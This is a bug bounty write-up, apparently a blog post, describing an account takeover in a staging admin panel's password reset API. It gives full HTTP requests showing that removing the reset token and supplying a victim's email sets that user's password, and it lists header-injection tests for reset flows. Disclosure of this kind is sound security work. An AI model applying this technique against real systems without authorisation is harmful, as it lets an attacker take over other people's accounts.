BOOK THIS SPACE FOR AD
ARTICLE ADI was hunting one of private program on hackerone the scope of this program is only one domain its kind of internal admin panel hosting on staging to test.
I just randomly checked every functionality and came to the password reset functionality i tried my methodology for testing password reset functionality for ATO like changing the Host header or adding extra Host, x-forwarded-host, x-forwarded-for headers and checking this reflecting on the password reset link or adding extra email param, making an array of email [the request in JSON format], etc but nothing worked
then I came to the password reset link I just opened the link replaced new credentials and captured the request
PUT /auth/api/v1/set-password HTTP/2Host: target.com
Cookie: cookietest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target/auth/password-reset?email=sushant_dhopat%40wearehackerone.com&new_user=false&reset_password_token=c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52&source_url=http%3A%2F%2Fbing.com
Content-Type: application/json
Origin: https://target.com
Content-Length: 150
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"password":"Ssd@9619979602","reset_password_token":"c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52","source_url":"https://target.com"}
now I started playing with this request I just checked when the admin user invites different users in the team when the user opens the setup account link/email verification link then this URL is also the same as the password reset URL or when the admin user set a password for particular user then this URL also same as password reset URL
just came to my mind I replaced the param password reset to email removed reset_password_token and add there email param with the victim's email address
now request will look like this
PUT /auth/api/v1/set-password HTTP/2Host: target.com
Cookie: cookietest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target/auth/password-reset?email=sushant_dhopat%40wearehackerone.com&new_user=false&reset_password_token=c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52&source_url=http%3A%2F%2Fbing.com
Content-Type: application/json
Origin: https://target.com
Content-Length: 150
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"password":"Css@9619979602","email":"victim@gmail.com","source_url":"https://target.com"}
I sent the request and unfortunately, the backend doesn’t check or verify the password reset token I just set a new password for victim@gmail.com like this I can set new passwords for any different user without any interaction leads to a full account takeover with just an email address
conclusion:-
just play with the password reset request replace params & add params etc and see how the request is behaving